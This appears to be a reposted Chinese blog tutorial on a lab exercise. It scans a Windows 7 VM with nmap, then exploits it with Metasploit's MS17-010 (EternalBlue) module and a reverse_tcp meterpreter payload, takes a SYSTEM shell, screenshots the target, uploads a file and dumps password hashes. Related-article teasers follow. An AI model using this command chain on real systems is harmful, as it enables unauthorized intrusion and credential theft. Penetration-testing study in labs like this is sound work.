nmap扫描和MS17-010(永恒之蓝)漏洞攻击

2023-12-29 14:20

本文主要是介绍nmap扫描和MS17-010(永恒之蓝)漏洞攻击,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

情况介绍

攻击机kali中使用ifconfig可以看到ip是192.168.0.106
在这里插入图片描述

靶机Window 7使用ipconfig可以看到ip192.168.0.100
在这里插入图片描述

Nmap

Nmap全称为Network Mapper,又成为“上帝之眼”,可以扫描ip和端口。

然后在kali攻击机上使用nmap 192.168.0.103可以看一下靶机里边开放的端口和对应服务。
在这里插入图片描述

Metasploit

sudo su - root把权限提高至root(最高权限)。
在这里插入图片描述

msfconsole进入到命令里边。
在这里插入图片描述

search MS17-010搜索漏洞脚本。
在这里插入图片描述

use 0选择攻击脚本。
set rhost 192.168.0.100设置靶机ip192.168.0.100
set lhost 192.168.0.106设置攻击地址为192.168.0.106
set payload windows/x64/meterpreter/reverse_tcp设置攻击脚本。
run进行执行。
在这里插入图片描述

getuid看一下登录到Window 7上边的权限。
在这里插入图片描述

shell进入到Windows 7命令行里边。
在这里插入图片描述

ipconfig查看Windows 7ip
在这里插入图片描述

可以看到有许多乱码,使用chcp 65001修改编码,再次使用ipconfig查看Windows 7ip就发现乱码基本上没有了。
在这里插入图片描述

whoami可以看到当前用户是system
在这里插入图片描述

按下Ctrl+c,然后输入y退出去Window 7命令行。
在这里插入图片描述

screenshot截了一张图。
在这里插入图片描述

截图打开如下:
在这里插入图片描述

vim good.txttest upload写进去。
在这里插入图片描述

upload /root/good.txt c:\\good.txt把攻击机kali中/root/good.txt发送到靶机Window 7c:\\good.txt
在这里插入图片描述

在靶机Window 7中打开c:\\good.txt
在这里插入图片描述

hashdump可以看一下用户信息。
在这里插入图片描述

可以在搜索引擎里边搜索meterpreter命令,看看其他命令。

我的微信号也是zhaoseaside,欢迎大家加我,提供实验镜像。

这篇关于nmap扫描和MS17-010(永恒之蓝)漏洞攻击的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/549700

相关文章

Python中文件读取操作漏洞深度解析与防护指南

《Python中文件读取操作漏洞深度解析与防护指南》在Web应用开发中,文件操作是最基础也最危险的功能之一,这篇文章将全面剖析Python环境中常见的文件读取漏洞类型,成因及防护方案,感兴趣的小伙伴可... 目录引言一、静态资源处理中的路径穿越漏洞1.1 典型漏洞场景1.2 os.path.join()的陷

Vue 调用摄像头扫描条码功能实现代码

《Vue调用摄像头扫描条码功能实现代码》本文介绍了如何使用Vue.js和jsQR库来实现调用摄像头并扫描条码的功能,通过安装依赖、获取摄像头视频流、解析条码等步骤,实现了从开始扫描到停止扫描的完整流... 目录实现步骤:代码实现1. 安装依赖2. vue 页面代码功能说明注意事项以下是一个基于 Vue.js

web网络安全之跨站脚本攻击(XSS)详解

《web网络安全之跨站脚本攻击(XSS)详解》:本文主要介绍web网络安全之跨站脚本攻击(XSS)的相关资料,跨站脚本攻击XSS是一种常见的Web安全漏洞,攻击者通过注入恶意脚本诱使用户执行,可能... 目录前言XSS 的类型1. 存储型 XSS(Stored XSS)示例:危害:2. 反射型 XSS(Re

SQL注入漏洞扫描之sqlmap详解

《SQL注入漏洞扫描之sqlmap详解》SQLMap是一款自动执行SQL注入的审计工具,支持多种SQL注入技术,包括布尔型盲注、时间型盲注、报错型注入、联合查询注入和堆叠查询注入... 目录what支持类型how---less-1为例1.检测网站是否存在sql注入漏洞的注入点2.列举可用数据库3.列举数据库

IDEA常用插件之代码扫描SonarLint详解

《IDEA常用插件之代码扫描SonarLint详解》SonarLint是一款用于代码扫描的插件,可以帮助查找隐藏的bug,下载并安装插件后,右键点击项目并选择“Analyze”、“Analyzewit... 目录SonajavascriptrLint 查找隐藏的bug下载安装插件扫描代码查看结果总结Sona

python-nmap实现python利用nmap进行扫描分析

《python-nmap实现python利用nmap进行扫描分析》Nmap是一个非常用的网络/端口扫描工具,如果想将nmap集成进你的工具里,可以使用python-nmap这个python库,它提供了... 目录前言python-nmap的基本使用PortScanner扫描PortScannerAsync异

速盾高防cdn是怎么解决网站攻击的?

速盾高防CDN是一种基于云计算技术的网络安全解决方案,可以有效地保护网站免受各种网络攻击的威胁。它通过在全球多个节点部署服务器,将网站内容缓存到这些服务器上,并通过智能路由技术将用户的请求引导到最近的服务器上,以提供更快的访问速度和更好的网络性能。 速盾高防CDN主要采用以下几种方式来解决网站攻击: 分布式拒绝服务攻击(DDoS)防护:DDoS攻击是一种常见的网络攻击手段,攻击者通过向目标网

【CTF Web】BUUCTF Upload-Labs-Linux Pass-13 Writeup(文件上传+PHP+文件包含漏洞+PNG图片马)

Upload-Labs-Linux 1 点击部署靶机。 简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 注意 1.每一关没有固定的通关方法,大家不要自限思维! 2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路

独立按键单击检测(延时消抖+定时器扫描)

目录 独立按键简介 按键抖动 模块接线 延时消抖 Key.h Key.c 定时器扫描按键代码 Key.h Key.c main.c 思考  MultiButton按键驱动 独立按键简介 ​ 轻触按键相当于一种电子开关,按下时开关接通,松开时开关断开,实现原理是通过轻触按键内部的金属弹片受力弹动来实现接通与断开。  ​ 按键抖动 由于按键内部使用的是机

Java反序列化漏洞-TemplatesImpl利用链分析

文章目录 一、前言二、正文1. 寻找利用链2. 构造POC2.1 生成字节码2.2 加载字节码1)getTransletInstance2)defineTransletClasses 2.3 创建实例 3. 完整POC 三、参考文章 一、前言 java.lang.ClassLoader#defineClass defineClass可以加载字节码,但由于defineClas